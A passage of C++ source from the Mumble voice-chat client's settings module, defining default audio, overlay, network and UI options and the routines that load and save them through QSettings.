if (qvData.canConvert<ShortcutTarget>()) {
const ShortcutTarget &sc = qvariant_cast<ShortcutTarget> (qvData);
return sc.isServerSpecific();
}
return false;
}
bool Shortcut::operator < (const Shortcut &other) const {
return (iIndex < other.iIndex);
}
bool Shortcut::operator == (const Shortcut &other) const {
return (iIndex == other.iIndex) && (qlButtons == other.qlButtons) && (qvData == other.qvData) && (bSuppress == other.bSuppress);
}
ShortcutTarget::ShortcutTarget() {
bUsers = true;
iChannel = -3;
bLinks = bChildren = bForceCenter = false;
}
bool ShortcutTarget::isServerSpecific() const {
return (! bUsers && (iChannel >= 0));
}
bool ShortcutTarget::operator == (const ShortcutTarget &o) const {
if ((bUsers != o.bUsers) || (bForceCenter != o.bForceCenter))
return false;
if (bUsers)
return (qlUsers == o.qlUsers) && (qlSessions == o.qlSessions);
else
return (iChannel == o.iChannel) && (bLinks == o.bLinks) && (bChildren == o.bChildren) && (qsGroup == o.qsGroup);
}
quint32 qHash(const ShortcutTarget &t) {
quint32 h = t.bForceCenter ? 0x55555555 : 0xaaaaaaaa;
if (t.bUsers) {
foreach(unsigned int u, t.qlSessions)
h ^= u;
} else {
h ^= t.iChannel;
if (t.bLinks)
h ^= 0x80000000;
if (t.bChildren)
h ^= 0x40000000;
h ^= qHash(t.qsGroup);
h = ~h;
}
return h;
}
quint32 qHash(const QList<ShortcutTarget> &l) {
quint32 h = l.count();
foreach(const ShortcutTarget &st, l)
h ^= qHash(st);
return h;
}
QDataStream &operator<< (QDataStream &qds, const ShortcutTarget &st) {
qds << st.bUsers << st.bForceCenter;
if (st.bUsers)
return qds << st.qlUsers;
else
return qds << st.iChannel << st.qsGroup << st.bLinks << st.bChildren;
}
QDataStream &operator>> (QDataStream &qds, ShortcutTarget &st) {
qds >> st.bUsers >> st.bForceCenter;
if (st.bUsers)
return qds >> st.qlUsers;
else
return qds >> st.iChannel >> st.qsGroup >> st.bLinks >> st.bChildren;
}
const QString Settings::cqsDefaultPushClickOn = QLatin1String(":/on.ogg");
const QString Settings::cqsDefaultPushClickOff = QLatin1String(":/off.ogg");
OverlaySettings::OverlaySettings() {
bEnable = true;
fX = 1.0f;
fY = 0.0f;
fZoom = 0.875f;
#ifdef Q_OS_MAC
qsStyle = QLatin1String("Cleanlooks");
#endif
osShow = LinkedChannels;
bAlwaysSelf = true;
uiActiveTime = 5;
osSort = Alphabetical;
qcUserName[Settings::Passive] = QColor(170, 170, 170);
qcUserName[Settings::Talking] = QColor(255, 255, 255);
qcUserName[Settings::Whispering] = QColor(128, 255, 128);
qcUserName[Settings::Shouting] = QColor(255, 128, 255);
qcChannel = QColor(255, 255, 128);
qcBoxPen = QColor(0, 0, 0, 224);
qcBoxFill = QColor(0, 0, 0);
setPreset();
// FPS display settings
qcFps = Qt::white;
fFps = 0.75f;
qfFps = qfUserName;
qrfFps = QRectF(10, 10, -1, 0.023438f);
bFps = false;
bUseWhitelist = false;
#ifdef Q_OS_WIN
int i = 0;
while (overlayBlacklist[i]) {
qslBlacklist << QLatin1String(overlayBlacklist[i]);
i++;
}
#endif
}
void OverlaySettings::setPreset(const OverlayPresets preset) {
switch (preset) {
case LargeSquareAvatar:
uiColumns = 2;
fUserName = 0.75f;
fChannel = 0.75f;
fMutedDeafened = 0.5f;
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(-0.0625f, 0.101563f - 0.0625f, 0.125f, 0.023438f);
qrfChannel = QRectF(-0.03125f, -0.0625f, 0.09375f, 0.015625f);
qrfMutedDeafened = QRectF(-0.0625f, -0.0625f, 0.0625f, 0.0625f);
qrfAvatar = QRectF(-0.0625f, -0.0625f, 0.125f, 0.125f);
fBoxPenWidth = (1.f / 256.0f);
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = true;
bMutedDeafened = true;
bAvatar = true;
bBox = false;
qaUserName = Qt::AlignCenter;
qaMutedDeafened = Qt::AlignLeft | Qt::AlignTop;
qaAvatar = Qt::AlignCenter;
qaChannel = Qt::AlignCenter;
break;
case AvatarAndName:
default:
uiColumns = 1;
fUserName = 1.0f;
fChannel = (7.0f / 8.0f);
fMutedDeafened = (7.0f / 8.0f);
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(0.015625f, -0.015625f, 0.250f, 0.03125f);
qrfChannel = QRectF(0.03125f, -0.015625f, 0.1875f, 0.015625f);
qrfMutedDeafened = QRectF(0.234375f, -0.015625f, 0.03125f, 0.03125f);
qrfAvatar = QRectF(-0.03125f, -0.015625f, 0.03125f, 0.03125f);
fBoxPenWidth = 0.0f;
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = false;
bMutedDeafened = true;
bAvatar = true;
bBox = true;
qaUserName = Qt::AlignLeft | Qt::AlignVCenter;
qaMutedDeafened = Qt::AlignRight | Qt::AlignVCenter;
qaAvatar = Qt::AlignRight | Qt::AlignVCenter;
qaChannel = Qt::AlignLeft | Qt::AlignTop;
break;
}
}
Settings::Settings() {
qRegisterMetaType<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaTypeStreamOperators<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaType<QVariant> ("QVariant");
atTransmit = VAD;
bTransmitPosition = false;
bMute = bDeaf = false;
bTTS = true;
bTTSMessageReadBack = false;
iTTSVolume = 75;
iTTSThreshold = 250;
iQuality = 40000;
fVolume = 1.0f;
fOtherVolume = 0.5f;
bAttenuateOthersOnTalk = false;
bAttenuateOthers = true;
iMinLoudness = 1000;
iVoiceHold = 50;
iJitterBufferSize = 1;
iFramesPerPacket = 2;
iNoiseSuppress = -30;
iIdleTime = 0;
vsVAD = Amplitude;
fVADmin = 0.80f;
fVADmax = 0.98f;
bTxAudioCue = false;
qsTxAudioCueOn = cqsDefaultPushClickOn;
qsTxAudioCueOff = cqsDefaultPushClickOff;
bUserTop = false;
bWhisperFriends = false;
uiDoublePush = 0;
bExpert = false;
#ifdef NO_UPDATE_CHECK
bUpdateCheck = false;
bPluginOverlayCheck = false;
#else
bUpdateCheck = true;
bPluginOverlayCheck = true;
#endif
qsImagePath = QDesktopServices::storageLocation(QDesktopServices::PicturesLocation);
ceExpand = ChannelsWithUsers;
ceChannelDrag = Ask;
bMinimalView = false;
bHideFrame = false;
aotbAlwaysOnTop = OnTopNever;
bAskOnQuit = true;
#ifdef Q_OS_WIN
// Don't enable minimize to tray by default on win7
bHideInTray = (QSysInfo::windowsVersion() != QSysInfo::WV_6_1);
#else
bHideInTray = true;
#endif
bStateInTray = true;
bUsage = true;
bShowUserCount = false;
wlWindowLayout = LayoutClassic;
bShowContextMenuInMenuBar = false;
ssFilter = ShowReachable;
iOutputDelay = 5;
qsALSAInput=QLatin1String("default");
qsALSAOutput=QLatin1String("default");
bEcho = false;
bEchoMulti = true;
bExclusiveInput = false;
bExclusiveOutput = false;
iPortAudioInput = -1; // default device
iPortAudioOutput = -1; // default device
bPositionalAudio = true;
bPositionalHeadphone = false;
fAudioMinDistance = 1.0f;
fAudioMaxDistance = 15.0f;
fAudioMaxDistVolume = 0.80f;
fAudioBloom = 0.5f;
iLCDUserViewMinColWidth = 50;
iLCDUserViewSplitterWidth = 2;
// PTT Button window
bShowPTTButtonWindow = false;
// Network settings
bTCPCompat = false;
bQoS = true;
bReconnect = true;
bAutoConnect = false;
ptProxyType = NoProxy;
usProxyPort = 0;
iMaxImageSize = ciDefaultMaxImageSize;
iMaxImageWidth = 1024; // Allow 1024x1024 resolution
iMaxImageHeight = 1024;
bSuppressIdentity = false;
// Accessibility
bHighContrast = false;
// Recording
qsRecordingPath = QDesktopServices::storageLocation(QDesktopServices::DocumentsLocation);
qsRecordingFile = QLatin1String("Mumble-%date-%time-%host-%user");
rmRecordingMode = RecordingMixdown;
iRecordingFormat = 0;
// Config updates
uiUpdateCounter = 0;
#if defined(AUDIO_TEST)
lmLoopMode = Server;
#else
lmLoopMode = None;
#endif
dPacketLoss = 0;
dMaxPacketDelay = 0.0f;
iMaxLogBlocks = 0;
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessages.insert(i, Settings::LogConsole | Settings::LogBalloon | Settings::LogTTS);
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessageSounds.insert(i, QString());
qmMessageSounds[Log::CriticalError] = QLatin1String(":/Critical.ogg");
qmMessageSounds[Log::PermissionDenied] = QLatin1String(":/PermissionDenied.ogg");
qmMessageSounds[Log::SelfMute] = QLatin1String(":/SelfMutedDeafened.ogg");
qmMessageSounds[Log::ServerConnected] = QLatin1String(":/ServerConnected.ogg");
qmMessageSounds[Log::ServerDisconnected] = QLatin1String(":/ServerDisconnected.ogg");
qmMessageSounds[Log::TextMessage] = QLatin1String(":/TextMessage.ogg");
qmMessageSounds[Log::ChannelJoin] = QLatin1String(":/UserJoinedChannel.ogg");
qmMessageSounds[Log::ChannelLeave] = QLatin1String(":/UserLeftChannel.ogg");
qmMessageSounds[Log::YouMutedOther] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouMuted] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouKicked] = QLatin1String(":/UserKickedYouOrByYou.ogg");
qmMessageSounds[Log::Recording] = QLatin1String(":/RecordingStateChanged.ogg");
qmMessages[Log::DebugInfo] = Settings::LogConsole;
qmMessages[Log::Warning] = Settings::LogConsole | Settings::LogBalloon;
qmMessages[Log::Information] = Settings::LogConsole;
qmMessages[Log::UserJoin] = Settings::LogConsole;
qmMessages[Log::UserLeave] = Settings::LogConsole;
qmMessages[Log::UserKicked] = Settings::LogConsole;
qmMessages[Log::OtherSelfMute] = Settings::LogConsole;
qmMessages[Log::OtherMutedOther] = Settings::LogConsole;
}
bool Settings::doEcho() const {
if (! bEcho)
return false;
if (AudioInputRegistrar::qmNew) {
AudioInputRegistrar *air = AudioInputRegistrar::qmNew->value(qsAudioInput);
if (air) {
if (air->canEcho(qsAudioOutput))
return true;
}
}
return false;
}
bool Settings::doPositionalAudio() const {
return bPositionalAudio;
}
#include BOOST_TYPEOF_INCREMENT_REGISTRATION_GROUP()
BOOST_TYPEOF_REGISTER_TYPE(Qt::Alignment)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AudioTransmit)
BOOST_TYPEOF_REGISTER_TYPE(Settings::VADSource)
BOOST_TYPEOF_REGISTER_TYPE(Settings::LoopMode)
BOOST_TYPEOF_REGISTER_TYPE(Settings::OverlayShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ProxyType)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelExpand)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelDrag)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ServerShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::WindowLayout)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AlwaysOnTopBehaviour)
BOOST_TYPEOF_REGISTER_TYPE(Settings::RecordingMode)
BOOST_TYPEOF_REGISTER_TYPE(QString)
BOOST_TYPEOF_REGISTER_TYPE(QByteArray)
BOOST_TYPEOF_REGISTER_TYPE(QColor)
BOOST_TYPEOF_REGISTER_TYPE(QVariant)
BOOST_TYPEOF_REGISTER_TYPE(QFont)
BOOST_TYPEOF_REGISTER_TEMPLATE(QList, 1)
#define SAVELOAD(var,name) var = qvariant_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var))
#define LOADENUM(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var).toInt())
#define LOADFLAG(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), static_cast<int>(var)).toInt())
void OverlaySettings::load() {
load(g.qs);
}
void OverlaySettings::load(QSettings* settings_ptr) {
SAVELOAD(bEnable, "enable");
LOADENUM(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
LOADENUM(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
LOADFLAG(qaUserName, "useralign");
LOADFLAG(qaChannel, "channelalign");
LOADFLAG(qaMutedDeafened, "mutedalign");
LOADFLAG(qaAvatar, "avataralign");
SAVELOAD(bUseWhitelist, "usewhitelist");
SAVELOAD(qslBlacklist, "blacklist");
SAVELOAD(qslWhitelist, "whitelist");
}
void Settings::load() {
load(g.qs);
}
void Settings::load(QSettings* settings_ptr) {
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
LOADENUM(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
LOADENUM(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(bSuppressIdentity, "net/suppress");
LOADENUM(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
LOADENUM(ceExpand, "ui/expand");
LOADENUM(ceChannelDrag, "ui/drag");
LOADENUM(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
LOADENUM(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
LOADENUM(ssFilter, "ui/serverfilter");
#ifndef NO_UPDATE_CHECK
SAVELOAD(bPluginOverlayCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
#endif
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
LOADENUM(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = qvariant_cast<QByteArray> (settings_ptr->value(QLatin1String("net/certificate")));
if (! qba.isEmpty())
kpCertificate = CertWizard::importCert(qba);
int nshorts = settings_ptr->beginReadArray(QLatin1String("shortcuts"));
for (int i=0; i<nshorts; i++) {
settings_ptr->setArrayIndex(i);
Shortcut s;
s.iIndex = -2;
SAVELOAD(s.iIndex, "index");
SAVELOAD(s.qlButtons, "keys");
SAVELOAD(s.bSuppress, "suppress");
s.qvData = settings_ptr->value(QLatin1String("data"));
if (s.iIndex >= -1)
qlShortcuts << s;
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmLCDDevices.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmPositionalAudioPlugins.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.load(settings_ptr);
settings_ptr->endGroup();
}
#undef SAVELOAD
#define SAVELOAD(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), var); else settings_ptr->remove(QLatin1String(name))
#define SAVEFLAG(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), static_cast<int>(var)); else settings_ptr->remove(QLatin1String(name))
void OverlaySettings::save() {
save(g.qs);
}
void OverlaySettings::save(QSettings* settings_ptr) {
OverlaySettings def;
settings_ptr->setValue(QLatin1String("version"), QLatin1String(MUMTEXT(MUMBLE_VERSION_STRING)));
settings_ptr->sync();
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
if (settings_ptr->format() == QSettings::IniFormat)
#endif
{
QFile f(settings_ptr->fileName());
f.setPermissions(f.permissions() & ~(QFile::ReadGroup | QFile::WriteGroup | QFile::ExeGroup | QFile::ReadOther | QFile::WriteOther | QFile::ExeOther));
}
SAVELOAD(bEnable, "enable");
SAVELOAD(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
SAVELOAD(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
SAVEFLAG(qaUserName, "useralign");
SAVEFLAG(qaChannel, "channelalign");
SAVEFLAG(qaMutedDeafened, "mutedalign");
SAVEFLAG(qaAvatar, "avataralign");
settings_ptr->setValue(QLatin1String("usewhitelist"), bUseWhitelist);
settings_ptr->setValue(QLatin1String("blacklist"), qslBlacklist);
settings_ptr->setValue(QLatin1String("whitelist"), qslWhitelist);
}
void Settings::save() {
QSettings* settings_ptr = g.qs;
Settings def;
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
SAVELOAD(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
SAVELOAD(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
SAVELOAD(ceExpand, "ui/expand");
SAVELOAD(ceChannelDrag, "ui/drag");
SAVELOAD(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
